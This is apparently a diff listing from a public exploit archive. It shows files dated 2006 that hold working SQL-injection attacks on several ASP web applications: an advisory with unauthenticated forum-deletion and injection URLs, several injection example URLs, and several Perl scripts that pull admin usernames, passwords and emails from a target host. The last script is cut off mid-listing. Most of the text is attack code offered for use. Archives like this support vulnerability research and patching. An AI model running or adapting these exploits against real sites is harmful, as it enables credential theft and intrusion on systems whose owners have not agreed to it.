target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13 target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come) Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake With objtake
.Open "GET" , come, FALSE .Open "GET" , come, FALSE
.sEnd .sEnd
take = .Responsetext take = .Responsetext
End With End With
SET objtake = Nothing SET objtake = Nothing
End Function End Function
get_username = take(target1) get_username = take(target1)
getdata=InStr(get_username,"0 0/" ) getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90) username=Mid(get_username,getdata+5,90)
%> %>
<center> <center>
<font face="Verdana" size="2" color="#008000"> <u><b> <font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font> ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">Data:</font></b></td> <b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%"> <td width="80%">
&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p> &nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></b></font></p>
</td> </td>
</tr> </tr>
</table> </table>
<form method="POST" name="form2" action="#"> <form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>"></p> <input type="hidden" name="field1" size="20" value="<%=username%>"></p>
</form> </form>
</center> </center>
<script language="JavaScript"> <script language="JavaScript">
write() write()
functionControl1() functionControl1()
</script> </script>
</body> </body>
</html> </html>
<% <%
End If End If
End If End If
End If End If
End If End If
Set objtake = Nothing Set objtake = Nothing
%> %>
# milw0rm.com [2006-10-27] # milw0rm.com [2006-10-27]

92
platforms/asp/webapps/2662.txt
View file

@ -1,46 +1,46 @@
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln. Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
SQL_Injection, Command Injection SQL_Injection, Command Injection
------- -------
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2 [KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3 Solution: Hotfix 3.3
Found Date: 7/1/2006 Found Date: 7/1/2006
Release Date: 10/10/2006 Release Date: 10/10/2006
Discussion: Discussion:
-------------------- --------------------
UnAuthenticated user can UnAuthenticated user can
1- delete every sites virtual directory on hc sites 1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc! 2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection 3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection 4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory. Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.
Exploit: (or POC) Exploit: (or POC)
-------------------- --------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum! 1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1 /forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
----------------------------------------------------------------- -----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum! 2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID= /forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
----------------------------------------------------------------- -----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection 3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1 /forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
----------------------------------------------------------------- -----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection 4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1 /forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
-------------------- --------------------
Credit : Credit :
-------------------- --------------------
Soroush Dalili of Kapda and GSG Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir] Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net] GSG - Grayhatz security group [http://www.Grayhatz.net]
# milw0rm.com [2006-10-27] # milw0rm.com [2006-10-27]

42
platforms/asp/webapps/2683.txt
View file

@ -1,21 +1,21 @@
******************************************************************************* *******************************************************************************
# Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability # Title : Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page: http://www.t-dreams.com # Script Page: http://www.t-dreams.com
******************************************************************************* *******************************************************************************
###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ] ###http://[target]/[path]/MainAnnounce2.asp?key=[ SQL ]
Example: Example:
//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin //MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-10-30] # milw0rm.com [2006-10-30]

42
platforms/asp/webapps/2684.txt
View file

@ -1,21 +1,21 @@
******************************************************************************* *******************************************************************************
# Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability # Title : Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page: http://www.t-dreams.com # Script Page: http://www.t-dreams.com
******************************************************************************* *******************************************************************************
###http://[target]/[path]/guestbookview.asp?key=[ SQL ] ###http://[target]/[path]/guestbookview.asp?key=[ SQL ]
Example: Example:
//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin //guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-10-30] # milw0rm.com [2006-10-30]

174
platforms/asp/webapps/2746.pl
View file

@ -1,87 +1,87 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit #[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit [// AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid] [// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "MoreInfo.asp?id="; $file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2]; $target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2]; $targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo; $targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){ if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n"; print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n"; print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n"; print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n"; print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n"; print $socket1 "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket1>) { while($answer = <$socket1>) {
if ($answer =~ /ltext\">(.*?)<\/td>/){ if ($answer =~ /ltext\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Password: $1\n"; print "+ Password: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-09] # milw0rm.com [2006-11-09]

170
platforms/asp/webapps/2754.pl
View file

@ -1,85 +1,85 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit #[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit [// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID="; $file = "cl_CatListing.asp?cl_cat_ID=";
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2]; $target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2]; $targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo; $targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){ if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n"; print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n"; print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n"; print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n"; print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n"; print $socket1 "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket1>) { while($answer = <$socket1>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){ if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Password: $1\n"; print "+ Password: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]

146
platforms/asp/webapps/2755.pl
View file

@ -1,73 +1,73 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit #[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit [// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid] [// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "propertysdetails.asp?PropID="; $file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2]; $target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /Location:(.*?)<\/font>/){ if ($answer =~ /Location:(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /Address:(.*?)<\/font>/){ if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
} }
if ($answer =~ /# Rooms:(.*?)<\/font>/){ if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n"; print "+ Email: $1\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]

40
platforms/asp/webapps/2756.txt
View file

@ -1,20 +1,20 @@
******************************************************************************* *******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability # Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ] ###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example: Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0 //Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0 //Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]

138
platforms/asp/webapps/2757.pl
View file

@ -1,69 +1,69 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit #[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit [// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID="; $file = "CampusNewsDetails.asp?NewsID=";
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2]; $target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){ if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){ if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]

138
platforms/asp/webapps/2761.pl
View file

@ -1,69 +1,69 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit #[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit [// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid="; $file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2]; $target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){ if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){ if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
exit(); exit();
} }
if ($answer =~ /Under Construction, Please check back soon.../) { if ($answer =~ /Under Construction, Please check back soon.../) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
